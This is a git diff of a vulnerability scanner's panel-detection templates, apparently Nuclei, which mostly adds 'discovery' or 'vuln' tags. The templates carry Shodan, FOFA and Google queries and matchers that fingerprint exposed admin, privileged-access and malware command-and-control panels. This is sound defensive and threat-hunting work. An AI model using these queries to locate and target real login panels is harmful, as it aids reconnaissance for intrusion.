b/http/exposed-panels/beego-admin-dashboard.yaml index b22dcb7d7fb..3b4c0637eff 100644 --- a/http/exposed-panels/beego-admin-dashboard.yaml +++ b/http/exposed-panels/beego-admin-dashboard.yaml @@ -22,7 +22,7 @@ info: - html:"Beego Admin Dashboard" - http.html:"beego admin dashboard" fofa-query: body="beego admin dashboard" - tags: panel,beego,unauth + tags: panel,beego,unauth,discovery http: - method: GET diff --git a/http/exposed-panels/beszel-panel.yaml b/http/exposed-panels/beszel-panel.yaml index 94d4942cf91..22b54d849d5 100644 --- a/http/exposed-panels/beszel-panel.yaml +++ b/http/exposed-panels/beszel-panel.yaml @@ -13,7 +13,7 @@ info: max-request: 1 verified: true shodan-query: http.title:"beszel" - tags: panel,beszel,login + tags: panel,beszel,login,discovery http: - method: GET diff --git a/http/exposed-panels/beyondtrust-login-server.yaml b/http/exposed-panels/beyondtrust-login-server.yaml index b8c0e6d10fe..2460955dc14 100644 --- a/http/exposed-panels/beyondtrust-login-server.yaml +++ b/http/exposed-panels/beyondtrust-login-server.yaml @@ -12,7 +12,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: beyondtrust,pam,panel + tags: beyondtrust,pam,panel,discovery http: - method: GET diff --git a/http/exposed-panels/beyondtrust-panel.yaml b/http/exposed-panels/beyondtrust-panel.yaml index 284af068f6b..5c7ff9ab8cd 100644 --- a/http/exposed-panels/beyondtrust-panel.yaml +++ b/http/exposed-panels/beyondtrust-panel.yaml @@ -14,7 +14,7 @@ info: shodan-query: http.html:"BeyondInsight" product: beyondinsight vendor: beyondtrust - tags: beyondtrust,pam,panel + tags: beyondtrust,pam,panel,discovery http: - method: GET diff --git a/http/exposed-panels/beyondtrust-priv-panel.yaml b/http/exposed-panels/beyondtrust-priv-panel.yaml index 4887c40d82c..6b44a0cb638 100644 --- a/http/exposed-panels/beyondtrust-priv-panel.yaml +++ b/http/exposed-panels/beyondtrust-priv-panel.yaml @@ -16,7 +16,7 @@ info: vendor: beyondtrust product: privileged_remote_access shodan-query: "http.html:\"BeyondTrust Privileged Remote Access Login\"" - tags: panel,beyondtrust,login,detect + tags: panel,beyondtrust,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/beyondtrust-remotesupport-panel.yaml b/http/exposed-panels/beyondtrust-remotesupport-panel.yaml index 59e67df3935..ebf07bfd0db 100644 --- a/http/exposed-panels/beyondtrust-remotesupport-panel.yaml +++ b/http/exposed-panels/beyondtrust-remotesupport-panel.yaml @@ -15,7 +15,7 @@ info: - icon_hash="-694003434" vendor: beyondtrust product: remote_support - tags: panel,detect,beyondtrust + tags: panel,detect,beyondtrust,discovery http: - method: GET diff --git a/http/exposed-panels/bigant-login-panel.yaml b/http/exposed-panels/bigant-login-panel.yaml index ed883a21f07..a38937a379c 100644 --- a/http/exposed-panels/bigant-login-panel.yaml +++ b/http/exposed-panels/bigant-login-panel.yaml @@ -11,7 +11,7 @@ info: metadata: max-request: 1 shodan-query: http.html:"BigAnt Admin" - tags: panel,bigant + tags: panel,bigant,discovery http: - method: GET diff --git a/http/exposed-panels/bigbluebutton-login.yaml b/http/exposed-panels/bigbluebutton-login.yaml index 48380b55a3d..427fb2c6cd3 100644 --- a/http/exposed-panels/bigbluebutton-login.yaml +++ b/http/exposed-panels/bigbluebutton-login.yaml @@ -14,7 +14,7 @@ info: max-request: 1 vendor: bigbluebutton product: greenlight - tags: panel,bigbluebutton + tags: panel,bigbluebutton,discovery http: - method: GET diff --git a/http/exposed-panels/bigfix-login.yaml b/http/exposed-panels/bigfix-login.yaml index afe079a53eb..b9edf660f74 100644 --- a/http/exposed-panels/bigfix-login.yaml +++ b/http/exposed-panels/bigfix-login.yaml @@ -17,7 +17,7 @@ info: google-query: intitle:"BigFix" product: bigfix_mobile vendor: hcltech - tags: panel,bigfix + tags: panel,bigfix,discovery http: - method: GET diff --git a/http/exposed-panels/bigip-rest-panel.yaml b/http/exposed-panels/bigip-rest-panel.yaml index 4a067588481..9d6b6b4ddbd 100644 --- a/http/exposed-panels/bigip-rest-panel.yaml +++ b/http/exposed-panels/bigip-rest-panel.yaml @@ -23,7 +23,7 @@ info: - http.title:"big-ip®-+redirect" +"server" fofa-query: title="big-ip®-+redirect" +"server" google-query: intitle:"big-ip®-+redirect" +"server" - tags: panel,bigip,f5 + tags: panel,bigip,f5,discovery http: - method: GET diff --git a/http/exposed-panels/biotime-panel.yaml b/http/exposed-panels/biotime-panel.yaml index eee6a3a3675..cf1e472b6ce 100644 --- a/http/exposed-panels/biotime-panel.yaml +++ b/http/exposed-panels/biotime-panel.yaml @@ -15,7 +15,7 @@ info: shodan-query: http.title:"BioTime" product: biotime vendor: zkteco - tags: panel,biotime + tags: panel,biotime,discovery http: - method: GET diff --git a/http/exposed-panels/bitdefender-gravityzone.yaml b/http/exposed-panels/bitdefender-gravityzone.yaml index 4b505a773c5..db0343411f4 100644 --- a/http/exposed-panels/bitdefender-gravityzone.yaml +++ b/http/exposed-panels/bitdefender-gravityzone.yaml @@ -19,7 +19,7 @@ info: - http.title:"bitdefender gravityzone" fofa-query: title="bitdefender gravityzone" google-query: intitle:"bitdefender gravityzone" - tags: panel,bitdefender + tags: panel,bitdefender,discovery http: - method: GET diff --git a/http/exposed-panels/bitrix-panel.yaml b/http/exposed-panels/bitrix-panel.yaml index f665daf3f2a..aaedcf18d15 100644 --- a/http/exposed-panels/bitrix-panel.yaml +++ b/http/exposed-panels/bitrix-panel.yaml @@ -16,7 +16,7 @@ info: product: bitrix24 shodan-query: http.html:"/bitrix/" fofa-query: body="/bitrix/" - tags: panel,bitrix,login + tags: panel,bitrix,login,discovery http: - method: GET diff --git a/http/exposed-panels/bitwarden-vault-panel.yaml b/http/exposed-panels/bitwarden-vault-panel.yaml index 18bae8d8aff..d9e917bafeb 100644 --- a/http/exposed-panels/bitwarden-vault-panel.yaml +++ b/http/exposed-panels/bitwarden-vault-panel.yaml @@ -18,7 +18,7 @@ info: - http.title:"bitwarden web vault" fofa-query: title="bitwarden web vault" google-query: intitle:"bitwarden web vault" - tags: panel,bitwarden,vault,detect + tags: panel,bitwarden,vault,detect,discovery http: - method: GET diff --git a/http/exposed-panels/black-duck-panel.yaml b/http/exposed-panels/black-duck-panel.yaml index 2e4bd5963cc..32128e9eabb 100644 --- a/http/exposed-panels/black-duck-panel.yaml +++ b/http/exposed-panels/black-duck-panel.yaml @@ -19,7 +19,7 @@ info: shodan-query: http.title:"Black Duck" product: black_duck_hub vendor: synopsys - tags: panel,blackduck,synopsys + tags: panel,blackduck,synopsys,discovery http: - method: GET diff --git a/http/exposed-panels/bloofoxcms-login-panel.yaml b/http/exposed-panels/bloofoxcms-login-panel.yaml index b60a85ca74f..9eda9d1f179 100644 --- a/http/exposed-panels/bloofoxcms-login-panel.yaml +++ b/http/exposed-panels/bloofoxcms-login-panel.yaml @@ -14,7 +14,7 @@ info: fofa-query: - Powered by bloofoxCMS - powered by bloofoxcms - tags: panel,bloofox,cms + tags: panel,bloofox,cms,discovery http: - method: GET diff --git a/http/exposed-panels/blue-iris-login.yaml b/http/exposed-panels/blue-iris-login.yaml index 3d5ac890f15..93116f16676 100644 --- a/http/exposed-panels/blue-iris-login.yaml +++ b/http/exposed-panels/blue-iris-login.yaml @@ -14,7 +14,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"Blue Iris Login" - tags: panel,blueiris,edb + tags: panel,blueiris,edb,discovery http: - method: GET diff --git a/http/exposed-panels/blue-yonder-panel.yaml b/http/exposed-panels/blue-yonder-panel.yaml index b05e7201246..3ba23b56c6a 100644 --- a/http/exposed-panels/blue-yonder-panel.yaml +++ b/http/exposed-panels/blue-yonder-panel.yaml @@ -1,32 +1,32 @@ -id: blue-yonder-panel - -info: - name: Blue Yonder Panel - Detect - author: sorrowx3 - severity: info - description: Blue Yonder login panel was discovered - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cwe-id: CWE-200 - metadata: - verified: true - max-request: 2 - shodan-query: html:"title=\"blue yonder\"" - tags: panel,login,blue-yonder,detect - -http: - - method: GET - path: - - "{{BaseURL}}" - - "{{BaseURL}}/base/home" - - stop-at-first-match: true - host-redirects: true - max-redirects: 2 - matchers: - - type: dsl - dsl: - - 'status_code == 200' - - 'contains(to_lower(body), "title=\"blue yonder\"")' +id: blue-yonder-panel + +info: + name: Blue Yonder Panel - Detect + author: sorrowx3 + severity: info + description: Blue Yonder login panel was discovered + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cwe-id: CWE-200 + metadata: + verified: true + max-request: 2 + shodan-query: html:"title=\"blue yonder\"" + tags: panel,login,blue-yonder,detect,discovery + +http: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/base/home" + + stop-at-first-match: true + host-redirects: true + max-redirects: 2 + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(to_lower(body), "title=\"blue yonder\"")' condition: and # digest: 490a0046304402205b96b65a086bd03bed8a30f9512b88f9a0490417f919cf7741eb05f60a9fd2ca02201ed91b161d7d7ecf07e68cab89061328b430e4c23370b5b357aabdb4c30a3dec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/bluemind-panel.yaml b/http/exposed-panels/bluemind-panel.yaml index 96c5af1a59f..029baaafec9 100644 --- a/http/exposed-panels/bluemind-panel.yaml +++ b/http/exposed-panels/bluemind-panel.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: http.title:"Welcome to BlueMind" - tags: bluemind,login,panel,detect + tags: bluemind,login,panel,detect,discovery http: - method: GET diff --git a/http/exposed-panels/bmc-panel-detect.yaml b/http/exposed-panels/bmc-panel-detect.yaml index 90c4d1422a8..e9a14dd0987 100644 --- a/http/exposed-panels/bmc-panel-detect.yaml +++ b/http/exposed-panels/bmc-panel-detect.yaml @@ -10,7 +10,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: panel,bmc + tags: panel,bmc,discovery http: - method: GET diff --git a/http/exposed-panels/bmc/bmc-controlm-mft-panel.yaml b/http/exposed-panels/bmc/bmc-controlm-mft-panel.yaml index 89f60433076..851abcb2e42 100644 --- a/http/exposed-panels/bmc/bmc-controlm-mft-panel.yaml +++ b/http/exposed-panels/bmc/bmc-controlm-mft-panel.yaml @@ -1,30 +1,30 @@ -id: bmc-controlm-mft-panel - -info: - name: BMC Control-M MFT Login Panel - Detect - author: righettod - severity: info - description: | - BMC Control-M MFT products was detected. - reference: - - https://documents.bmc.com/supportu/9.0.21/en-US/Documentation/Managed_File_Transfer.htm - - https://documents.bmc.com/supportu/9.0.21/en-US/Documentation/home.htm - metadata: - max-request: 1 - verified: true - shodan-query: http.title:"File Exchange" - tags: panel,bmc,login,detect - -http: - - method: GET - path: - - "{{BaseURL}}" - - matchers: - - type: dsl - dsl: - - 'status_code == 200' - - 'contains(to_lower(body), "file exchange")' - - 'contains_any(to_lower(body), "main-b2b-icon.png", "fileexchange.ico")' +id: bmc-controlm-mft-panel + +info: + name: BMC Control-M MFT Login Panel - Detect + author: righettod + severity: info + description: | + BMC Control-M MFT products was detected. + reference: + - https://documents.bmc.com/supportu/9.0.21/en-US/Documentation/Managed_File_Transfer.htm + - https://documents.bmc.com/supportu/9.0.21/en-US/Documentation/home.htm + metadata: + max-request: 1 + verified: true + shodan-query: http.title:"File Exchange" + tags: panel,bmc,login,detect,discovery + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(to_lower(body), "file exchange")' + - 'contains_any(to_lower(body), "main-b2b-icon.png", "fileexchange.ico")' condition: and # digest: 4b0a00483046022100d06508bc6e6131037b9f72ac1041d9bbf172b7717e24e05b07fc7943fdd84d09022100ef6b78a254d4559cf309d020c63ad5f3f96bbfe84194f4ad66fc6ddefef8cc3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/bmc/bmc-discovery-panel.yaml b/http/exposed-panels/bmc/bmc-discovery-panel.yaml index 4a994aa9fe0..6efd78688ab 100644 --- a/http/exposed-panels/bmc/bmc-discovery-panel.yaml +++ b/http/exposed-panels/bmc/bmc-discovery-panel.yaml @@ -14,7 +14,7 @@ info: verified: true max-request: 1 shodan-query: http.title:"BMC Software" - tags: panel,bmc + tags: panel,bmc,discovery http: - method: GET diff --git a/http/exposed-panels/bmc/bmc-remedy-sso-panel.yaml b/http/exposed-panels/bmc/bmc-remedy-sso-panel.yaml index 9f495fd17b3..6e67d3eda5f 100644 --- a/http/exposed-panels/bmc/bmc-remedy-sso-panel.yaml +++ b/http/exposed-panels/bmc/bmc-remedy-sso-panel.yaml @@ -1,5 +1,5 @@ -id: bmc-remedy-sso-panel - +id: bmc-remedy-sso-panel + info: name: BMC Remedy SSO Login Panel - Detect author: righettod @@ -12,20 +12,20 @@ info: verified: true max-request: 2 shodan-query: http.title:"BMC Remedy Single Sign-On domain data entry" - tags: panel,bmc,login,detect + tags: panel,bmc,login,detect,discovery -http: - - method: GET - path: - - "{{BaseURL}}/arsys/" - - "{{BaseURL}}/webUI/userHome.do" - - stop-at-first-match: true - - matchers: - - type: dsl - dsl: - - 'status_code == 200' - - 'contains(to_lower(body), "bmc remedy single sign-on domain data entry")' +http: + - method: GET + path: + - "{{BaseURL}}/arsys/" + - "{{BaseURL}}/webUI/userHome.do" + + stop-at-first-match: true + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(to_lower(body), "<title>bmc remedy single sign-on domain data entry")' condition: and # digest: 4a0a0047304502200407984b68ae05e258f4b17bc6b6a61068ed8dbe89109377e542cd2595a3bd45022100dcd824da48381e765567f08e2aa8f7ea3c311ea2c71436600e99bb727f25970e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/bolt-cms-panel.yaml b/http/exposed-panels/bolt-cms-panel.yaml index 2ba946790da..54c601660a2 100644 --- a/http/exposed-panels/bolt-cms-panel.yaml +++ b/http/exposed-panels/bolt-cms-panel.yaml @@ -16,7 +16,7 @@ info: vendor: boltcms product: bolt shodan-query: cpe:"cpe:2.3:a:bolt:bolt" - tags: panel,bolt,cms,login,boltcms + tags: panel,bolt,cms,login,boltcms,discovery http: - method: GET diff --git a/http/exposed-panels/bomgar-login-panel.yaml b/http/exposed-panels/bomgar-login-panel.yaml index 63561147b3a..aca846f9b09 100644 --- a/http/exposed-panels/bomgar-login-panel.yaml +++ b/http/exposed-panels/bomgar-login-panel.yaml @@ -10,7 +10,7 @@ info: cwe-id: CWE-200 metadata: max-request: 2 - tags: panel,bomgar,beyondtrust + tags: panel,bomgar,beyondtrust,discovery http: - method: GET diff --git a/http/exposed-panels/bonita-portal-panel.yaml b/http/exposed-panels/bonita-portal-panel.yaml index 636312d796c..b6594cb0249 100644 --- a/http/exposed-panels/bonita-portal-panel.yaml +++ b/http/exposed-panels/bonita-portal-panel.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: http.favicon.hash:-1197926023 - tags: bonita,login,panel + tags: bonita,login,panel,discovery http: - method: GET diff --git a/http/exposed-panels/bonobo-server-panel.yaml b/http/exposed-panels/bonobo-server-panel.yaml index afd581fb12d..02f3c7f3acd 100644 --- a/http/exposed-panels/bonobo-server-panel.yaml +++ b/http/exposed-panels/bonobo-server-panel.yaml @@ -14,7 +14,7 @@ info: vendor: bonobogitserver product: bonobo_git_server shodan-query: http.favicon.hash:-219625874 - tags: panel,bonobo,git,login,detect + tags: panel,bonobo,git,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/bookstack-panel.yaml b/http/exposed-panels/bookstack-panel.yaml index 9d997847ad3..9b990046f55 100644 --- a/http/exposed-panels/bookstack-panel.yaml +++ b/http/exposed-panels/bookstack-panel.yaml @@ -20,7 +20,7 @@ info: - http.title:"bookstack" fofa-query: title="bookstack" google-query: intitle:"bookstack" - tags: panel,bookstack,bookstackapp + tags: panel,bookstack,bookstackapp,discovery http: - method: GET diff --git a/http/exposed-panels/brother-printer-panel.yaml b/http/exposed-panels/brother-printer-panel.yaml index 27c0bfbbce5..d69f60cead5 100644 --- a/http/exposed-panels/brother-printer-panel.yaml +++ b/http/exposed-panels/brother-printer-panel.yaml @@ -21,7 +21,7 @@ info: - app="brother-Printer" zoomeye-query: - device="brother-Printer" || app="brother-Printer" - tags: panel,brother,printer,iot + tags: panel,brother,printer,iot,discovery http: - method: GET diff --git a/http/exposed-panels/buddy-panel.yaml b/http/exposed-panels/buddy-panel.yaml index 1ea83834852..2620881ec0f 100644 --- a/http/exposed-panels/buddy-panel.yaml +++ b/http/exposed-panels/buddy-panel.yaml @@ -13,7 +13,7 @@ info: metadata: max-request: 1 shodan-query: http.favicon.hash:-850502287 - tags: panel,buddy,cicd + tags: panel,buddy,cicd,discovery http: - method: GET diff --git a/http/exposed-panels/buildbot-panel.yaml b/http/exposed-panels/buildbot-panel.yaml index 93b97ae487c..9cbcc8c15fc 100644 --- a/http/exposed-panels/buildbot-panel.yaml +++ b/http/exposed-panels/buildbot-panel.yaml @@ -21,7 +21,7 @@ info: - http.title:"buildbot" fofa-query: title="buildbot" google-query: intitle:"buildbot" - tags: panel,buildbot,cicd + tags: panel,buildbot,cicd,discovery http: - method: GET diff --git a/http/exposed-panels/busybox-repository-browser.yaml b/http/exposed-panels/busybox-repository-browser.yaml index d32811f34ac..e69543e3bf3 100644 --- a/http/exposed-panels/busybox-repository-browser.yaml +++ b/http/exposed-panels/busybox-repository-browser.yaml @@ -16,7 +16,7 @@ info: vendor: busybox product: busybox fofa-query: title="Busybox Repository Browser" - tags: detect,busybox,oss,panel + tags: detect,busybox,oss,panel,discovery http: - method: GET diff --git a/http/exposed-panels/bynder-panel.yaml b/http/exposed-panels/bynder-panel.yaml index 14104d8708f..4fdc1abfe0f 100644 --- a/http/exposed-panels/bynder-panel.yaml +++ b/http/exposed-panels/bynder-panel.yaml @@ -1,5 +1,5 @@ -id: bynder-panel - +id: bynder-panel + info: name: Bynder Login Panel - Detect author: righettod @@ -12,24 +12,24 @@ info: verified: true max-request: 1 shodan-query: http.favicon.hash:1017650009 - tags: panel,bynder,login,detect + tags: panel,bynder,login,detect,discovery -http: - - method: GET - path: - - "{{BaseURL}}/login/" - - matchers: - - type: dsl - dsl: - - 'status_code == 200' - - 'contains_any(to_lower(body), "bynder.", "bynder brand portal", "bynder login")' - condition: and - - extractors: - - type: regex - part: body - group: 1 - regex: +http: + - method: GET + path: + - "{{BaseURL}}/login/" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains_any(to_lower(body), "bynder.", "bynder brand portal", "bynder login")' + condition: and + + extractors: + - type: regex + part: body + group: 1 + regex: - 'http-equiv="version"\s+content="([0-9\.]+)"' # digest: 4a0a00473045022100d94b9f1a2102a30596f016b6ea566e73ee136cb740c686f4fb41a769025c2e630220752dd245df5205251414b1128de8fe62df2148789bb05d361fefcb1c94d8b1d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/c2/amatera-stealer-panel.yaml b/http/exposed-panels/c2/amatera-stealer-panel.yaml index c13b708a642..e6efa900d80 100644 --- a/http/exposed-panels/c2/amatera-stealer-panel.yaml +++ b/http/exposed-panels/c2/amatera-stealer-panel.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: http.title:"Amatera App" - tags: c2,amatera,stealer,panel,login + tags: c2,amatera,stealer,panel,login,vuln http: - method: GET diff --git a/http/exposed-panels/c2/ares-rat-c2.yaml b/http/exposed-panels/c2/ares-rat-c2.yaml index 1d81f2aca7e..f648c04d3cb 100644 --- a/http/exposed-panels/c2/ares-rat-c2.yaml +++ b/http/exposed-panels/c2/ares-rat-c2.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: product:'Ares RAT C2' - tags: c2,ir,osint,ares,panel,rat + tags: c2,ir,osint,ares,panel,rat,vuln http: - method: GET diff --git a/http/exposed-panels/c2/bofamet-stealer-panel.yaml b/http/exposed-panels/c2/bofamet-stealer-panel.yaml index 660462c8a6a..413fa2f4375 100644 --- a/http/exposed-panels/c2/bofamet-stealer-panel.yaml +++ b/http/exposed-panels/c2/bofamet-stealer-panel.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: http.title:"bofamet" - tags: c2,bofamet,stealer,panel,cti,login + tags: c2,bofamet,stealer,panel,cti,login,vuln http: - method: GET diff --git a/http/exposed-panels/c2/brute-ratel-c4.yaml b/http/exposed-panels/c2/brute-ratel-c4.yaml index 0a97cc98866..0b91afe6d94 100644 --- a/http/exposed-panels/c2/brute-ratel-c4.yaml +++ b/http/exposed-panels/c2/brute-ratel-c4.yaml @@ -12,7 +12,7 @@ info: verified: "true" max-request: 1 shodan-query: http.html_hash:-1957161625 - tags: c2,bruteratel,c4,panel + tags: c2,bruteratel,c4,panel,vuln http: - method: GET diff --git a/http/exposed-panels/c2/caldera-c2.yaml b/http/exposed-panels/c2/caldera-c2.yaml index 837e92c7141..a433d2d486c 100644 --- a/http/exposed-panels/c2/caldera-c2.yaml +++ b/http/exposed-panels/c2/caldera-c2.yaml @@ -17,7 +17,7 @@ info: vendor: mitre product: caldera fofa-query: http.favicon.hash:-636718605 - tags: c2,ir,osint,caldera,panel + tags: c2,ir,osint,caldera,panel,vuln http: - method: GET diff --git a/http/exposed-panels/c2/covenant-c2.yaml b/http/exposed-panels/c2/covenant-c2.yaml index 0c7b66f463b..dd1ef660703 100644 --- a/http/exposed-panels/c2/covenant-c2.yaml +++ b/http/exposed-panels/c2/covenant-c2.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: ssl:”Covenant” http.component:”Blazor” - tags: c2,ir,osint,covenant,panel + tags: c2,ir,osint,covenant,panel,vuln http: - method: GET diff --git a/http/exposed-panels/c2/cyber-stealer-panel.yaml b/http/exposed-panels/c2/cyber-stealer-panel.yaml index e23fb562f8d..78931563732 100644 --- a/http/exposed-panels/c2/cyber-stealer-panel.yaml +++ b/http/exposed-panels/c2/cyber-stealer-panel.yaml @@ -13,7 +13,7 @@ info: max-request: 1 shodan-query: html:"Cyber Stealer - Secure Access" fofa-query: title="Cyber Stealer - Secure Access" - tags: c2,cyber-stealer,stealer,panel,login + tags: c2,cyber-stealer,stealer,panel,login,vuln http: - method: GET diff --git a/http/exposed-panels/c2/deimos-c2.yaml b/http/exposed-panels/c2/deimos-c2.yaml index 78348327aec..60ab61a1064 100644 --- a/http/exposed-panels/c2/deimos-c2.yaml +++ b/http/exposed-panels/c2/deimos-c2.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: http.html_hash:-14029177 - tags: c2,ir,osint,deimosc2,panel + tags: c2,ir,osint,deimosc2,panel,vuln http: - method: GET diff --git a/http/exposed-panels/c2/empire-c2.yaml b/http/exposed-panels/c2/empire-c2.yaml index 99ad1cb810c..a4b0419d1f9 100644 --- a/http/exposed-panels/c2/empire-c2.yaml +++ b/http/exposed-panels/c2/empire-c2.yaml @@ -13,7 +13,7 @@ info: verified: "true" max-request: 1 censys-query: bc517bf173440dad15b99a051389fadc366d5df2 || dcb32e6256459d3660fdc90e4c79e95a921841cc - tags: c2,ir,osint,empire,panel + tags: c2,ir,osint,empire,panel,vuln http: - method: GET diff --git a/http/exposed-panels/c2/evilginx.yaml b/http/exposed-panels/c2/evilginx.yaml index 7b76c175824..676eff0cc90 100644 --- a/http/exposed-panels/c2/evilginx.yaml +++ b/http/exposed-panels/c2/evilginx.yaml @@ -12,7 +12,7 @@ info: verified: "true" max-request: 1 censys-query: b18d778b4e4b6bf1fd5b2d790c941270145a6a6d - tags: tech,evilginx,c2,phishing,panel + tags: tech,evilginx,c2,phishing,panel,vuln http: - method: GET diff --git a/http/exposed-panels/c2/hack5-cloud-c2.yaml b/http/exposed-panels/c2/hack5-cloud-c2.yaml index f64423c7754..ec86ef1367b 100644 --- a/http/exposed-panels/c2/hack5-cloud-c2.yaml +++ b/http/exposed-panels/c2/hack5-cloud-c2.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 fofa-query: app="Hak5-C2" - tags: c2,ir,osint,hack5c2,panel + tags: c2,ir,osint,hack5c2,panel,vuln http: - method: GET diff --git a/http/exposed-panels/c2/hookbot-rat.yaml b/http/exposed-panels/c2/hookbot-rat.yaml index 1d82bb28fef..8fdfcb244e9 100644 --- a/http/exposed-panels/c2/hookbot-rat.yaml +++ b/http/exposed-panels/c2/hookbot-rat.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: title:"hookbot" - tags: tech,rat,hookbot,c2,panel,detect + tags: tech,rat,hookbot,c2,panel,detect,vuln http: - method: GET diff --git a/http/exposed-panels/c2/meduza-stealer.yaml b/http/exposed-panels/c2/meduza-stealer.yaml index d7a00cdbb1c..3f16185f492 100644 --- a/http/exposed-panels/c2/meduza-stealer.yaml +++ b/http/exposed-panels/c2/meduza-stealer.yaml @@ -10,7 +10,7 @@ info: verified: "true" max-request: 1 shodan-query: http.title:"Meduza Stealer" - tags: rat,meduza-stealer,c2,panel + tags: rat,meduza-stealer,c2,panel,vuln http: - method: GET diff --git a/http/exposed-panels/c2/mystic-stealer.yaml b/http/exposed-panels/c2/mystic-stealer.yaml index ce4b75785fe..20cab45e500 100644 --- a/http/exposed-panels/c2/mystic-stealer.yaml +++ b/http/exposed-panels/c2/mystic-stealer.yaml @@ -10,7 +10,7 @@ info: verified: "true" max-request: 1 shodan-query: http.title:"Mystic Stealer" - tags: tech,rat,mystic-stealer,c2,panel + tags: tech,rat,mystic-stealer,c2,panel,vuln http: - method: GET diff --git a/http/exposed-panels/c2/mythic-c2.yaml b/http/exposed-panels/c2/mythic-c2.yaml index 55723a46342..83e07760774 100644 --- a/http/exposed-panels/c2/mythic-c2.yaml +++ b/http/exposed-panels/c2/mythic-c2.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 1 shodan-query: ssl:Mythic port:7443 - tags: c2,ir,osint,mythic,panel + tags: c2,ir,osint,mythic,panel,vuln http: - method: GET diff --git a/http/exposed-panels/c2/nh-c2.yaml b/http/exposed-panels/c2/nh-c2.yaml index 5d551826d18..c2aab3cae79 100644 --- a/http/exposed-panels/c2/nh-c2.yaml +++ b/http/exposed-panels/c2/nh-c2.yaml @@ -10,7 +10,7 @@ info: verified: "true" max-request: 1 censys-query: 10baf5fcdde4563d3e145a1f553ae433fb1c3572 - tags: tech,nh,c2,panel + tags: tech,nh,c2,panel,vuln http: - method: GET diff --git a/http/exposed-panels/c2/oxf-phaas-panel.yaml b/http/exposed-panels/c2/oxf-phaas-panel.yaml index 472c5a22cb2..7decad98573 100644 --- a/http/exposed-panels/c2/oxf-phaas-panel.yaml +++ b/http/exposed-panels/c2/oxf-phaas-panel.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 fofa-query: title="OXF Panel" - tags: c2,oxf,phishing,panel,login + tags: c2,oxf,phishing,panel,login,vuln http: - method: GET diff --git a/http/exposed-panels/c2/pupyc2.yaml b/http/exposed-panels/c2/pupyc2.yaml index bba95f3c28c..6d837b2768a 100644 --- a/http/exposed-panels/c2/pupyc2.yaml +++ b/http/exposed-panels/c2/pupyc2.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 1 shodan-query: aa3939fc357723135870d5036b12a67097b03309 - tags: c2,ir,osint,pupyc2,panel + tags: c2,ir,osint,pupyc2,panel,vuln http: - method: GET diff --git a/http/exposed-panels/c2/rhadamanthys-stealer-panel.yaml b/http/exposed-panels/c2/rhadamanthys-stealer-panel.yaml index 2e8737b0f5b..9b171328513 100644 --- a/http/exposed-panels/c2/rhadamanthys-stealer-panel.yaml +++ b/http/exposed-panels/c2/rhadamanthys-stealer-panel.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: c2,rhadamanthys,stealer,panel + tags: c2,rhadamanthys,stealer,panel,vuln http: - method: GET diff --git a/http/exposed-panels/c2/supershell-c2.yaml b/http/exposed-panels/c2/supershell-c2.yaml index ca4eddbd6bd..35e3bd1cc66 100644 --- a/http/exposed-panels/c2/supershell-c2.yaml +++ b/http/exposed-panels/c2/supershell-c2.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 1 fofa-query: icon_hash="-1010228102" - tags: c2,ir,osint,supershell,panel + tags: c2,ir,osint,supershell,panel,vuln http: - method: GET diff --git a/http/exposed-panels/c2/viper-c2.yaml b/http/exposed-panels/c2/viper-c2.yaml index 3182fc45c9a..ae80a54a231 100644 --- a/http/exposed-panels/c2/viper-c2.yaml +++ b/http/exposed-panels/c2/viper-c2.yaml @@ -13,7 +13,7 @@ info: max-request: 1 shodan-query: http.html_hash:1015055567 censys-query: 057f3b5488605b4d224d038e340866e2cdfed4a3 - tags: tech,viper,c2,malware,ir,panel + tags: tech,viper,c2,malware,ir,panel,vuln http: - method: GET diff --git a/http/exposed-panels/cacti-panel.yaml b/http/exposed-panels/cacti-panel.yaml index 5f4b4d8b248..556e0738eb3 100644 --- a/http/exposed-panels/cacti-panel.yaml +++ b/http/exposed-panels/cacti-panel.yaml @@ -28,7 +28,7 @@ info: google-query: - intitle:"login to cacti" - intitle:"cacti" - tags: cacti,login,panel,detect + tags: cacti,login,panel,detect,discovery http: - method: GET diff --git a/http/exposed-panels/calendarix-panel.yaml b/http/exposed-panels/calendarix-panel.yaml index 0a33f5ddf68..1c2da21c642 100644 --- a/http/exposed-panels/calendarix-panel.yaml +++ b/http/exposed-panels/calendarix-panel.yaml @@ -10,7 +10,7 @@ info: cwe-id: CWE-200 metadata: max-request: 2 - tags: panel,calendarix,login + tags: panel,calendarix,login,discovery http: - method: GET diff --git 